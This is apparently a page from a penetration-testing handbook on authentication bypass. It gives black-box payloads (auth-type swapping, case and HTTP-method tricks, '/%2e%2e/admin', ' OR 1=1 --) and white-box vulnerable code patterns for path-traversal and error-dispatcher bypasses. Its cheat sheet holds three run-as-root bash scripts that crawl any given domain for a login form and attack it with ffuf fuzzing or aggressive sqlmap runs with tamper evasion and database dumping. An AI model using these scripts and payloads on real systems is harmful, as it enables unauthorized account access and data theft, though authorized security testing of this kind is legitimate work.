Bypassing Authentication Schema

Check List

Ensure that authentication is applied across all services that require it.

Methodology

Black Box

Auth Type Manipulation

Log in to the target site, go to the authentication page, and check if it uses multiple types of authentication, such as password, email, Google, and Facebook

Enter the request using an incorrect password and email address. Intercept the POST request using Bupr Suite

Then examine the intercepted request and see if you see a parameter called auth_type

If you see such a parameter that specifies the type of authentication with Google or Facebook or password and email, send the request to the repeater

And then change the authentication type in the auth_type parameter to facebook

"auth_type": "email" → "facebook"

If the user information is displayed in the server response, the authentication bypass is confirmed

Email Domain Validation Bypass

Access registration form

Enter email test@redacted.com, Capture POST request in Burp

Notice server prepends or validates only suffix (@redacted.com)

email=bishal@redacted.com

Modify email domain to any external domain

email=bishal0x01@bugcrowdninja.com

Send request

Receive verification email at bishal0x01@bugcrowdninja.com

Click link, Account activated

Change The Letter Case

Use the enumerate Application command to perform the identification process and obtain the sensitive paths of the admin panel

Access known admin path

GET /admin HTTP/1.1

If it gives you a 403 error with a 401 in response, then send the following request

GET /AdMiN HTTP/1.1
GET /ADMIN HTTP/1.1
GET /aDmIn HTTP/1.1
GET /Admin HTTP/1.1
GET /aDMIN HTTP/1.1

If any variation returns 200 OK, Case sensitivity bypass confirmed

HTTP Method Bypass Auth

Make a request to the admin panel and check if it gives you a 403 in response

If it gives you a 403 error with a 401 then change the HTTP method to PUT or Patch or ...

PATCH /admin HTTP/1.1
HEAD /admin HTTP/1.1
PUT /admin HTTP/.1.1

Path Confusion Auth Bypass

Request a sensitive route like the panel or admin route and if it gives you a 403, try to mislead the route using the payload below

GET /%2e%2e/admin HTTP/1.1

If the server response shows login or admin information, the vulnerability is confirmed

Bypass Auth Via SQL injection

Navigate to the SignUp page of the target website, typically located at a URL like /signup or /register Open https://example.com/signup in the browser

Identify the “Full Name” input field in the SignUp form, which is prone to processing user input directly into database queries Find the text box labeled “Full Name” in the form

Enter the payload ' OR 1=1 -- into the Full Name field to attempt bypassing the query’s conditions and access unauthorized data Input John' OR 1=1 -- in the Full Name field

Click the “Sign Up” button to send the payload to the server via a _POSTrequest

Look for a generic error (“Invalid input”) or a 400/500 status code, indicating the payload was blocked, or unexpected success, suggesting a vulnerability

If a 400/500 error appears, modify the payload to ' OR 1=2 -- and submit again. Compare responses: if ' OR 1=1 -- allows form submission or data access (account creation without valid input) while ' OR 1=2 -- fails, it confirms SQL injection, as the true condition (1=1) altered the query’s logic

White Box

Bypass Authentication via Path Traversal

Map the entire target system using Burp Suite

Draw all endpoints in XMind

Decompile the web server based on the programming language used

In the code, look for classes and functions that process authentication endpoints

Then, in the class that handles the authentication endpoint, look for paths in the code where exceptions exist and authentication is bypassed, like in the code below

VSCode (Regex Detection)

(?<Source>Request\.(Path|PathBase|RawUrl))|(?<Sink>Contains\s*\(\s*"/(actuator|admin|health)"\s*\)|EndsWith\s*\(\s*"/v1/ping"\s*\)|skipAuth\s*=\s*true)

RipGrep (Regex Detection (Linux))

(Request\.(Path|PathBase|RawUrl))|(Contains\s*\(\s*"/(actuator|admin|health)"\s*\)|EndsWith\s*\(\s*"/v1/ping"\s*\)|skipAuth\s*=\s*true)

Vulnerable Code Patterns

string clienturi = URIUtil.GetNormalizeURI(request);
// ...

if (clienturi.Contains("/actuator") || clienturi.EndsWith("/v1/ping") /* ... */)
{
    skipAuth = true;
}

Also review how the request is received and processed

public static string GetNormalizeURI(HttpRequest request)
{
    string uri = request.Path.Value;
    return RemoveExtraSlash(
        Uri.UnescapeDataString(
            new Uri(uri, UriKind.RelativeOrAbsolute)
                .Normalize()
                .ToString()
        )
    );
}

public static String getNormalizeURI(HttpServletRequest request) {
    String uri = request.getRequestURI();
    return removeExtraSlash(
        URLDecoder.decode(
            URI.create(uri).normalize().toString(),
            StandardCharsets.UTF_8
        )
    );
}

public static function getNormalizeURI($request)
{
    $uri = $request->getRequestUri();
    return self::removeExtraSlash(
        urldecode(
            (new \GuzzleHttp\Psr7\Uri($uri))
                ->normalize()
                ->__toString()
        )
    );
}

The final request will look like the following

/portalapi/v1/users/username/admin;%2fv1%2fping

Authentication Bypass via Error Dispatcher

Map the entire target system using the Burp Suite tool

Map the entry points and endpoints in Xmind

Decompile the application based on the programming language used

Note all pre-login endpoints and license-related endpoints in the code and configuration that make security decisions based on the URL path, such as the path below

/license/Unlicensed.xhtml

Intentionally add invalid paths to the URL and send requests to trigger error handling

/license/Unlicensed.xhtml/x

Then review this path in the code under the error-handling logic to check whether an unauthenticated user is given a session for communication or not

VSCode (Regex Detection)

(?<Source>HttpContext\.Items|Request\.(Query|Params))|(?<Sink>StartsWith\s*\(|Activate|License|Admin)

RipGrep (Regex Detection (Linux))

(HttpContext\.Items|Request\.(Query|Params))|(StartsWith\s*\(|Activate|License|Admin)

Vulnerable Code Patterns

protected void DoGet(HttpRequest request, HttpResponse response)
{
    int? statusCode = request.HttpContext.Features.Get<IExceptionHandlerFeature>()?.Error is HttpException httpEx ? (int?)httpEx.StatusCode : null;
    string message = request.HttpContext.Features.Get<IExceptionHandlerFeature>()?.Error?.Message;
    Type exceptionType = request.HttpContext.Features.Get<IExceptionHandlerFeature>()?.Error?.GetType();
    string requestUri = request.Path;
    Exception exception = request.HttpContext.Features.Get<IExceptionHandlerFeature>()?.Error;
    string remoteAddr = request.HttpContext.Connection.RemoteIpAddress?.ToString();
    string gaRequestAction = request.Query["GARequestAction"];

    if (statusCode == null && exceptionType == null && exception == null)
    {
        response.StatusCode = 404;
    }
    else if (!BypassHandling(statusCode, requestUri))
    {
        if (requestUri.StartsWith(request.PathBase + "/license/Unlicensed.xhtml")) // [1]
        {
            if (!string.IsNullOrEmpty(gaRequestAction) && gaRequestAction.Equals("activate", StringComparison.OrdinalIgnoreCase))
            {
                string token = SessionUtilities.GenerateLicenseRequestToken(request.HttpContext.Session); // [2]
                try
                {
                    LicenseUtilities.RequestOnlineActivation(request, response, token); // [3]
                    return;
                }
                catch (Exception ex)
                {
                    LOGGER.LogError(ex, ex.Message);
                }
            }

            response.Redirect(requestUri);
        }
    }
}

public static void doGet(HttpServletRequest req, HttpServletResponse res) throws Exception {
    Integer statusCode = req.getStatus() != 0 ? req.getStatus() : null;
    String message = req.getAttribute("message") != null ? req.getAttribute("message").toString() : null;
    Class<?> exceptionType = req.getAttribute("error") != null
            ? req.getAttribute("error").getClass()
            : null;
    String requestUri = req.getRequestURI();
    Object exception = req.getAttribute("error");
    String remoteAddr = req.getRemoteAddr();
    String gaRequestAction = req.getParameter("GARequestAction");

    if (statusCode == null && exceptionType == null && exception == null) {
        res.setStatus(HttpServletResponse.SC_NOT_FOUND);
        res.getWriter().write("Not Found");
    } else if (!bypassHandling(statusCode, requestUri)) {
        if (requestUri.startsWith(req.getContextPath() + "/license/Unlicensed.xhtml")) { // [1]
            if (gaRequestAction != null && gaRequestAction.toLowerCase().equals("activate")) {
                String token = SessionUtilities.generateLicenseRequestToken(req.getSession()); // [2]
                try {
                    LicenseUtilities.requestOnlineActivation(req, res, token); // [3]
                    return;
                } catch (Exception err) {
                    System.err.println(err.getMessage());
                    err.printStackTrace();
                }
            }

            res.sendRedirect(requestUri);
        }
    }
}

public function doGet(Request $request, Response $response)
{
    $statusCode = $request->attributes->get('javax.servlet.error.status_code');
    $message = $request->attributes->get('javax.servlet.error.message');
    $exceptionType = $request->attributes->get('javax.servlet.error.exception_type');
    $requestUri = $request->attributes->get('javax.servlet.error.request_uri');
    $exception = $request->attributes->get('javax.servlet.error.exception');
    $remoteAddr = $request->ip();
    $gaRequestAction = $request->query('GARequestAction');

    if ($statusCode === null && $exceptionType === null && $exception === null) {
        return response()->setStatusCode(404);
    } elseif (!$this->bypassHandling($statusCode, $requestUri)) {
        if (str_starts_with($requestUri, $request->getBasePath() . "/license/Unlicensed.xhtml")) { // [1]
            if (!empty($gaRequestAction) && strcasecmp($gaRequestAction, "activate") === 0) {
                $token = SessionUtilities::generateLicenseRequestToken($request->session()); // [2]
                try {
                    LicenseUtilities::requestOnlineActivation($request, $response, $token); // [3]
                    return;
                } catch (\Exception $e) {
                    $this->LOGGER->error($e->getMessage(), ['exception' => $e]);
                }
            }

            return redirect($requestUri);
        }
    }
}

async function doGet(req, reply) {
    const statusCode = req.statusCode || null;
    const message = req.message || null;
    const exceptionType = req.error?.constructor || null;
    const requestUri = req.url;
    const exception = req.error || null;
    const remoteAddr = req.ip;
    const gaRequestAction = req.query.GARequestAction;

    if (!statusCode && !exceptionType && !exception) {
        reply.status(404).send('Not Found');
    } else if (!bypassHandling(statusCode, requestUri)) {
        if (requestUri.startsWith(req.routerPath + "/license/Unlicensed.xhtml")) { // [1]
            if (gaRequestAction && gaRequestAction.toLowerCase() === "activate") {
                const token = SessionUtilities.generateLicenseRequestToken(req.session); // [2]
                try {
                    await LicenseUtilities.requestOnlineActivation(req, reply, token); // [3]
                    return;
                } catch (err) {
                    req.log.error(err.message, err);
                }
            }

            reply.redirect(requestUri);
        }
    }
}

Finally, by abusing the path error, it is possible to obtain a session for connection and interaction

Cheat Sheet

Parameter Modification

Katana & FFUF

Create Script

sudo nano auth-bypass-params.sh

#!/bin/bash

# Config & Colors
RED='\e[1;31m'; GREEN='\e[1;32m'; YELLOW='\e[1;33m'; CYAN='\e[1;36m'; RESET='\e[0m'
color_print() { printf "${!1}%b${RESET}\n" "$2"; }

# Root Check
[[ "$(id -u)" -ne 0 ]] && { color_print RED "[X] Please run as ROOT."; exit 1; }

# Input Check
if [ $# -lt 1 ]; then
    echo "Usage: $0 <domain.com>"
    exit 1
fi

URL="$1"
DEPS="git curl golang ffuf"

# Install Katana
if ! command -v katana &>/dev/null; then
    color_print GREEN "[*] Installing katana ..."
    go install github.com/projectdiscovery/katana/cmd/katana@latest;sudo ln -fs ~/go/bin/katana /usr/bin/katana
fi

# Install Packages
for pkg in $DEPS; do
    if ! dpkg -s "$pkg" &>/dev/null; then
        color_print YELLOW "[!] Installing $pkg..."
        apt install -y "$pkg"
    fi
done

# Find Login Page
LOGIN=$(katana -u "$URL" -depth 3 -silent | \
grep -iE "/(login|signin|sign-in|auth|user/login|admin/login|my-account|account|wp-login\.php)(/)?$" | \
grep -viE "lost-password|reset|forgot|register|signup|signout|logout|\.(js|css|jpg|png|gif|svg|ico)$" | \
sed 's:[/?]*$::' | sed 's:$:/:' | head -n 1)

if [ -z "$LOGIN" ]; then
    echo "[!] No login page found. Exiting."
    exit 1
fi

# Fetch HTML
HTML=$(curl -s "$LOGIN")
FORM=$(echo "$HTML" | sed -n '/<form/,/<\/form>/p' | head -n 100)

# CAPTCHA / reCAPTCHA Check
CAPTCHA_KEYWORDS="g-recaptcha|recaptcha|h-captcha|data-sitekey|captcha|grecaptcha.execute|hcaptcha.execute"
if echo "$HTML" | grep -qiE "$CAPTCHA_KEYWORDS"; then
    echo "[!] CAPTCHA detected on login page."
    exit 1
fi

# Extract Form Action and Method
ACTION=$(echo "$FORM" | grep -oEi 'action="[^"]*"' | head -1 | cut -d'"' -f2)
[ -z "$ACTION" ] && ACTION="$LOGIN"

METHOD=$(echo "$FORM" | grep -oEi 'method="[^"]+"' | head -1 | cut -d'"' -f2 | tr '[:upper:]' '[:lower:]')
[ -z "$METHOD" ] && METHOD="post"

if [[ "$ACTION" == /* ]]; then
    BASE_URL=$(echo "$URL" | sed 's|^\(https\?://[^/]*\).*|\1|')
    FULL_ACTION="${BASE_URL}${ACTION}"
elif [[ "$ACTION" =~ ^https?:// ]]; then
    FULL_ACTION="$ACTION"
else
    BASE_URL=$(echo "$LOGIN" | sed 's|\(https\?://.*/\).*|\1|')
    FULL_ACTION="${BASE_URL}${ACTION}"
fi

# Extract Username & Password Ffiles
USERNAME_FIELD=$(echo "$FORM" | grep -oEi '<input[^>]*name="[^"]+"' | \
grep -Ei 'user(name)?|login(_id)?|userid|uname|mail|email|auth_user' | head -1 | sed -E 's/.*name="([^"]+)".*/\1/')
PASSWORD_FIELD=$(echo "$FORM" | grep -oEi '<input[^>]*name="[^"]+"' | \
grep -Ei 'pass(word)?|passwd|pwd|auth_pass|login_pass' | head -1 | sed -E 's/.*name="([^"]+)".*/\1/')

[ -z "$USERNAME_FIELD" ] && USERNAME_FIELD="username"
[ -z "$PASSWORD_FIELD" ] && PASSWORD_FIELD="password"

# CSRF Token Extration
CSRF_FIELD=""
CSRF_VALUE=""

HIDDEN_INPUTS=$(echo "$FORM" | grep -oiP '<input[^>]+type=["'\'']?hidden["'\'']?[^>]*>')
while read -r INPUT; do
    NAME=$(echo "$INPUT" | grep -oiP 'name=["'\'']?\K[^"'\'' ]+')
    VALUE=$(echo "$INPUT" | grep -oiP 'value=["'\'']?\K[^"'\'' ]+')
    if [[ "$NAME" =~ csrf|token|nonce|authenticity|verification ]]; then
        CSRF_FIELD="$NAME"
        CSRF_VALUE="$VALUE"
        break
    fi
done <<< "$HIDDEN_INPUTS"

if [ -z "$CSRF_FIELD" ] && [ -n "$HIDDEN_INPUTS" ]; then
    CSRF_FIELD=$(echo "$HIDDEN_INPUTS" | grep -oiP 'name=["'\'']?\K[^"'\'' ]+' | head -1)
    CSRF_VALUE=$(echo "$HIDDEN_INPUTS" | grep -oiP 'value=["'\'']?\K[^"'\'' ]+' | head -1)
fi

# Prepre POST Data
DATA="${USERNAME_FIELD}=admin&${PASSWORD_FIELD}=12341234@"
[ -n "$CSRF_FIELD" ] && [ -n "$CSRF_VALUE" ] && DATA="${CSRF_FIELD}=${CSRF_VALUE}&${DATA}"

# Extract Cookies
COOKIES=$(curl -s -I "$URL" \
  | grep -i '^Set-Cookie:' \
  | sed -E 's/^Set-Cookie: //I' \
  | cut -d';' -f1 \
  | grep -i 'PHPSESSID')

# Extract only domain and port
HOST=$(echo "$URL" | sed -E 's~^https?://([^/]+).*~\1~')

# Headers
HEADERS=(
  -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:142.0) Gecko/20100101 Firefox/142.0"
  -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
  -H "Accept-Language: en-US,fa-IR;q=0.5"
  -H "Accept-Encoding: gzip, deflate"
  -H "Content-Type: application/x-www-form-urlencoded"
  -H "Origin: $URL"
  -H "Sec-GPC: 1"
  -H "Connection: keep-alive"
  -H "Referer: $LOGIN"
  -H "Cookie: $COOKIES"
  -H "Upgrade-Insecure-Requests: 1"
  -H "Priority: u=0, i"
)

# Auth Bypass Header
payload_list="/tmp/payloads.txt"
cat > $payload_list << EOF
authenticated=yes
authenticated=true
authenticated=1
logged_in=yes
logged_in=true
logged_in=1
is_logged_in=yes
is_logged_in=true
is_logged_in=1
is_authenticated=yes
is_authenticated=true
is_authenticated=1
auth=yes
auth=true
auth=1
auth_user=yes
auth_user=true
auth_user=1
auth_user_id=yes
auth_user_id=true
auth_user_id=1
auth_role=yes
auth_role=true
auth_role=1
auth_role_id=yes
auth_role_id=true
auth_role_id=1
auth_role_name=yes
auth_role_name=true
auth_role_name=1
EOF

# Run FFUF
if [[ "$METHOD" == "get" ]]; then
    FFUF_URL="${FULL_ACTION}?${DATA}"
    ffuf -u "$FFUF_URL?FUZZ" \
         -w "$payload_list:FUZZ" \
         -X GET \
         -ac -c -r -mc 200 \
         "${HEADERS[@]}"
else
    ffuf -u "$FULL_ACTION?FUZZ" \
         -w "$payload_list:FUZZ" \
         -X POST -d "$DATA" \
         -ac -c -r -mc 200 \
         "${HEADERS[@]}"
fi

Run Script

sudo chmod +x auth-bypass-params.sh;sudo ./auth-bypass-params.sh $WEBSITE

Session ID Prediction

Burpsuite > Intercept Request (Generative Page) > Right Click > Send Sequencer Section > Start Analyze

SQL Injection (HTML Form Authentication)

Katana & SQLMap

Create Script

sudo nano auth-bypass-sqli.sh

#!/bin/bash

# Config & Colors
RED='\e[1;31m'; GREEN='\e[1;32m'; YELLOW='\e[1;33m'; CYAN='\e[1;36m'; RESET='\e[0m'
color_print() { printf "${!1}%b${RESET}\n" "$2"; }

# Root Check
[[ "$(id -u)" -ne 0 ]] && { color_print RED "[X] Please run as ROOT."; exit 1; }

# Input Check
if [ $# -lt 1 ]; then
    echo "Usage: $0 <domain.com>"
    exit 1
fi

URL="$1"
DEPS="git curl golang ffuf sqlmap"

# Install Katana
if ! command -v katana &>/dev/null; then
    color_print GREEN "[*] Installing katana ..."
    go install github.com/projectdiscovery/katana/cmd/katana@latest;sudo ln -fs ~/go/bin/katana /usr/bin/katana
fi

# Install Packages
for pkg in $DEPS; do
    if ! dpkg -s "$pkg" &>/dev/null; then
        color_print YELLOW "[!] Installing $pkg..."
        apt install -y "$pkg"
    fi
done

# Find Login Page
LOGIN=$(katana -u "$URL" -depth 3 -silent | \
grep -iE "/(login|signin|sign-in|auth|user/login|admin/login|my-account|account|wp-login\.php)(/)?$" | \
grep -viE "lost-password|reset|forgot|register|signup|signout|logout|\.(js|css|jpg|png|gif|svg|ico)$" | \
sed 's:[/?]*$::' | sed 's:$:/:' | head -n 1)

if [ -z "$LOGIN" ]; then
    echo "[!] No login page found. Exiting."
    exit 1
fi

# Fetch HTML
HTML=$(curl -s "$LOGIN")
FORM=$(echo "$HTML" | sed -n '/<form/,/<\/form>/p' | head -n 100)

# CAPTCHA / reCAPTCHA Check
CAPTCHA_KEYWORDS="g-recaptcha|recaptcha|h-captcha|data-sitekey|captcha|grecaptcha.execute|hcaptcha.execute"
if echo "$HTML" | grep -qiE "$CAPTCHA_KEYWORDS"; then
    echo "[!] CAPTCHA detected on login page."
    exit 1
fi

# Extract Form Action and Method
ACTION=$(echo "$FORM" | grep -oEi 'action="[^"]*"' | head -1 | cut -d'"' -f2)
[ -z "$ACTION" ] && ACTION="$LOGIN"

METHOD=$(echo "$FORM" | grep -oEi 'method="[^"]+"' | head -1 | cut -d'"' -f2 | tr '[:upper:]' '[:lower:]')
[ -z "$METHOD" ] && METHOD="post"

if [[ "$ACTION" == /* ]]; then
    BASE_URL=$(echo "$URL" | sed 's|^\(https\?://[^/]*\).*|\1|')
    FULL_ACTION="${BASE_URL}${ACTION}"
elif [[ "$ACTION" =~ ^https?:// ]]; then
    FULL_ACTION="$ACTION"
else
    BASE_URL=$(echo "$LOGIN" | sed 's|\(https\?://.*/\).*|\1|')
    FULL_ACTION="${BASE_URL}${ACTION}"
fi

# Extract Username & Password Ffiles
USERNAME_FIELD=$(echo "$FORM" | grep -oEi '<input[^>]*name="[^"]+"' | \
grep -Ei 'user(name)?|login(_id)?|userid|uname|mail|email|auth_user' | head -1 | sed -E 's/.*name="([^"]+)".*/\1/')
PASSWORD_FIELD=$(echo "$FORM" | grep -oEi '<input[^>]*name="[^"]+"' | \
grep -Ei 'pass(word)?|passwd|pwd|auth_pass|login_pass' | head -1 | sed -E 's/.*name="([^"]+)".*/\1/')

[ -z "$USERNAME_FIELD" ] && USERNAME_FIELD="username"
[ -z "$PASSWORD_FIELD" ] && PASSWORD_FIELD="password"

# CSRF Token Extration
CSRF_FIELD=""
CSRF_VALUE=""

HIDDEN_INPUTS=$(echo "$FORM" | grep -oiP '<input[^>]+type=["'\'']?hidden["'\'']?[^>]*>')
while read -r INPUT; do
    NAME=$(echo "$INPUT" | grep -oiP 'name=["'\'']?\K[^"'\'' ]+')
    VALUE=$(echo "$INPUT" | grep -oiP 'value=["'\'']?\K[^"'\'' ]+')
    if [[ "$NAME" =~ csrf|token|nonce|authenticity|verification ]]; then
        CSRF_FIELD="$NAME"
        CSRF_VALUE="$VALUE"
        break
    fi
done <<< "$HIDDEN_INPUTS"

if [ -z "$CSRF_FIELD" ] && [ -n "$HIDDEN_INPUTS" ]; then
    CSRF_FIELD=$(echo "$HIDDEN_INPUTS" | grep -oiP 'name=["'\'']?\K[^"'\'' ]+' | head -1)
    CSRF_VALUE=$(echo "$HIDDEN_INPUTS" | grep -oiP 'value=["'\'']?\K[^"'\'' ]+' | head -1)
fi

# Prepre POST Data
DATA="${USERNAME_FIELD}=admin&${PASSWORD_FIELD}=12341234@"
[ -n "$CSRF_FIELD" ] && [ -n "$CSRF_VALUE" ] && DATA="${CSRF_FIELD}=${CSRF_VALUE}&${DATA}"

# Extract Cookies
COOKIES=$(curl -s -I "$URL" \
  | grep -i '^Set-Cookie:' \
  | sed -E 's/^Set-Cookie: //I' \
  | cut -d';' -f1 \
  | grep -i 'PHPSESSID')

# Extract only domain and port
HOST=$(echo "$URL" | sed -E 's~^https?://([^/]+).*~\1~')

# Headers - Define directly in sqlmap format (name: value)
SQLMAP_HEADERS="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,fa-IR;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Origin: $URL
Sec-GPC: 1
Connection: keep-alive
Referer: $LOGIN
Upgrade-Insecure-Requests: 1
Priority: u=0, i"

# Run SQLMAP
if [[ "$METHOD" == "get" ]]; then
    SQLMAP_URL="${FULL_ACTION}?${DATA}"
    sqlmap -u "$SQLMAP_URL" \
           --headers="$SQLMAP_HEADERS" \
           --cookie="$COOKIES" \
           --batch --level=5 --risk=3 -v 3 \
           --random-agent --threads=10 \
           --tamper=space2comment,randomcase \
           --not-string="invalid\|incorrect\|failed\|error\|denied" \
           --dbs --banner --current-user --current-db --is-dba

else
    sqlmap -u "$FULL_ACTION" \
           --data="$DATA" \
           --headers="$SQLMAP_HEADERS" \
           --cookie="$COOKIES" \
           --batch --level=5 --risk=3 -v 3 \
           --random-agent --threads=10 \
           --tamper=space2comment,randomcase \
           --not-string="invalid\|incorrect\|failed\|error\|denied" \
           --dbs --banner --current-user --current-db --is-dba
fi

Run Script

sudo chmod +x auth-bypass-sqli.sh;sudo ./auth-bypass-sqli.sh $WEBSITE

PHP Loose Comparison

Katana & FFUF

Create Script

sudo nano auth-bypass-tj.sh

#!/bin/bash

# Config & Colors
RED='\e[1;31m'; GREEN='\e[1;32m'; YELLOW='\e[1;33m'; CYAN='\e[1;36m'; RESET='\e[0m'
color_print() { printf "${!1}%b${RESET}\n" "$2"; }

# Root Check
[[ "$(id -u)" -ne 0 ]] && { color_print RED "[X] Please run as ROOT."; exit 1; }

# Input Check
if [ $# -lt 1 ]; then
    echo "Usage: $0 <domain.com>"
    exit 1
fi

URL="$1"
DEPS="git curl golang ffuf"

# Install Katana
if ! command -v katana &>/dev/null; then
    color_print GREEN "[*] Installing katana ..."
    go install github.com/projectdiscovery/katana/cmd/katana@latest;sudo ln -fs ~/go/bin/katana /usr/bin/katana
fi

# Install Packages
for pkg in $DEPS; do
    if ! dpkg -s "$pkg" &>/dev/null; then
        color_print YELLOW "[!] Installing $pkg..."
        apt install -y "$pkg"
    fi
done

# Find Login Page
LOGIN=$(katana -u "$URL" -depth 3 -silent | \
grep -iE "/(login|signin|sign-in|auth|user/login|admin/login|my-account|account|wp-login\.php)(/)?$" | \
grep -viE "lost-password|reset|forgot|register|signup|signout|logout|\.(js|css|jpg|png|gif|svg|ico)$" | \
sed 's:[/?]*$::' | sed 's:$:/:' | head -n 1)

if [ -z "$LOGIN" ]; then
    echo "[!] No login page found. Exiting."
    exit 1
fi

# Fetch HTML
HTML=$(curl -s "$LOGIN")
FORM=$(echo "$HTML" | sed -n '/<form/,/<\/form>/p' | head -n 100)

# CAPTCHA / reCAPTCHA Check
CAPTCHA_KEYWORDS="g-recaptcha|recaptcha|h-captcha|data-sitekey|captcha|grecaptcha.execute|hcaptcha.execute"
if echo "$HTML" | grep -qiE "$CAPTCHA_KEYWORDS"; then
    echo "[!] CAPTCHA detected on login page."
    exit 1
fi

# Extract Form Action and Method
ACTION=$(echo "$FORM" | grep -oEi 'action="[^"]*"' | head -1 | cut -d'"' -f2)
[ -z "$ACTION" ] && ACTION="$LOGIN"

METHOD=$(echo "$FORM" | grep -oEi 'method="[^"]+"' | head -1 | cut -d'"' -f2 | tr '[:upper:]' '[:lower:]')
[ -z "$METHOD" ] && METHOD="post"

if [[ "$ACTION" == /* ]]; then
    BASE_URL=$(echo "$URL" | sed 's|^\(https\?://[^/]*\).*|\1|')
    FULL_ACTION="${BASE_URL}${ACTION}"
elif [[ "$ACTION" =~ ^https?:// ]]; then
    FULL_ACTION="$ACTION"
else
    BASE_URL=$(echo "$LOGIN" | sed 's|\(https\?://.*/\).*|\1|')
    FULL_ACTION="${BASE_URL}${ACTION}"
fi

# Extract Username & Password Ffiles
USERNAME_FIELD=$(echo "$FORM" | grep -oEi '<input[^>]*name="[^"]+"' | \
grep -Ei 'user(name)?|login(_id)?|userid|uname|mail|email|auth_user' | head -1 | sed -E 's/.*name="([^"]+)".*/\1/')
PASSWORD_FIELD=$(echo "$FORM" | grep -oEi '<input[^>]*name="[^"]+"' | \
grep -Ei 'pass(word)?|passwd|pwd|auth_pass|login_pass' | head -1 | sed -E 's/.*name="([^"]+)".*/\1/')

[ -z "$USERNAME_FIELD" ] && USERNAME_FIELD="username"
[ -z "$PASSWORD_FIELD" ] && PASSWORD_FIELD="password"

# CSRF Token Extration
CSRF_FIELD=""
CSRF_VALUE=""

HIDDEN_INPUTS=$(echo "$FORM" | grep -oiP '<input[^>]+type=["'\'']?hidden["'\'']?[^>]*>')
while read -r INPUT; do
    NAME=$(echo "$INPUT" | grep -oiP 'name=["'\'']?\K[^"'\'' ]+')
    VALUE=$(echo "$INPUT" | grep -oiP 'value=["'\'']?\K[^"'\'' ]+')
    if [[ "$NAME" =~ csrf|token|nonce|authenticity|verification ]]; then
        CSRF_FIELD="$NAME"
        CSRF_VALUE="$VALUE"
        break
    fi
done <<< "$HIDDEN_INPUTS"

if [ -z "$CSRF_FIELD" ] && [ -n "$HIDDEN_INPUTS" ]; then
    CSRF_FIELD=$(echo "$HIDDEN_INPUTS" | grep -oiP 'name=["'\'']?\K[^"'\'' ]+' | head -1)
    CSRF_VALUE=$(echo "$HIDDEN_INPUTS" | grep -oiP 'value=["'\'']?\K[^"'\'' ]+' | head -1)
fi

# Prepre POST Data
DATA="${USERNAME_FIELD}=top_admin&${PASSWORD_FIELD}=FUZZ"
[ -n "$CSRF_FIELD" ] && [ -n "$CSRF_VALUE" ] && DATA="${CSRF_FIELD}=${CSRF_VALUE}&${DATA}"

# Extract Cookies
COOKIES=$(curl -s -I "$URL" \
  | grep -i '^Set-Cookie:' \
  | sed -E 's/^Set-Cookie: //I' \
  | cut -d';' -f1 \
  | grep -i 'PHPSESSID')

# Extract only domain and port
HOST=$(echo "$URL" | sed -E 's~^https?://([^/]+).*~\1~')

# Headers
HEADERS=(
  -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:142.0) Gecko/20100101 Firefox/142.0"
  -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
  -H "Accept-Language: en-US,fa-IR;q=0.5"
  -H "Accept-Encoding: gzip, deflate"
  -H "Content-Type: application/x-www-form-urlencoded"
  -H "Origin: $URL"
  -H "Sec-GPC: 1"
  -H "Connection: keep-alive"
  -H "Referer: $LOGIN"
  -H "Cookie: $COOKIES"
  -H "Upgrade-Insecure-Requests: 1"
  -H "Priority: u=0, i"
)

# Auth Bypass Header
payload_list="/tmp/payloads.txt"
cat > $payload_list << EOF
0
0e0
0e12345
0e215962017
0e11111111
0e1294123
null
NULL
true
false
"0"
"0e0"
"null"
[]
{}
EOF

# Run FFUF
if [[ "$METHOD" == "get" ]]; then
    FFUF_URL="${FULL_ACTION}?${DATA}"
    ffuf -u "$FFUF_URL" \
         -w "$payload_list:FUZZ" \
         -X GET \
         -ac -c -r \
         -mc 200 \
         "${HEADERS[@]}"
else
    ffuf -u "$FULL_ACTION" \
         -w "$payload_list:FUZZ" \
         -X POST \
         -d "$DATA" \
         -ac -c -r \
         -mc 200 \
         "${HEADERS[@]}"
fi

Run Script

sudo chmod +x auth-bypass-tj.sh;sudo ./auth-bypass-tj.sh $WEBSITE

PreviousWeak Lock Out Mechanism NextVulnerable Remember Password

Last updated 6 hours ago

hashtagCheck List

hashtagMethodology

hashtagBlack Box

hashtagAuth Type Manipulation

hashtagEmail Domain Validation Bypass

hashtagChange The Letter Case

hashtagHTTP Method Bypass Auth

hashtagPath Confusion Auth Bypass

hashtagBypass Auth Via SQL injectionarrow-up-right

hashtagWhite Box

hashtagBypass Authentication via Path Traversal

hashtagAuthentication Bypass via Error Dispatcher

hashtagCheat Sheet

hashtagParameter Modification

hashtagKatana arrow-up-right& FFUFarrow-up-right

hashtagSession ID Prediction

hashtagSQL Injection (HTML Form Authentication)

hashtagKatana arrow-up-right& SQLMaparrow-up-right

hashtagPHP Loose Comparison

hashtagKatana arrow-up-right& FFUFarrow-up-right

Check List

Methodology

Black Box

Auth Type Manipulation

Email Domain Validation Bypass

Change The Letter Case

HTTP Method Bypass Auth

Path Confusion Auth Bypass

Bypass Auth Via SQL injection

White Box

Bypass Authentication via Path Traversal

Authentication Bypass via Error Dispatcher

Cheat Sheet

Parameter Modification

Katana & FFUF

Session ID Prediction

SQL Injection (HTML Form Authentication)

Katana & SQLMap

PHP Loose Comparison

Katana & FFUF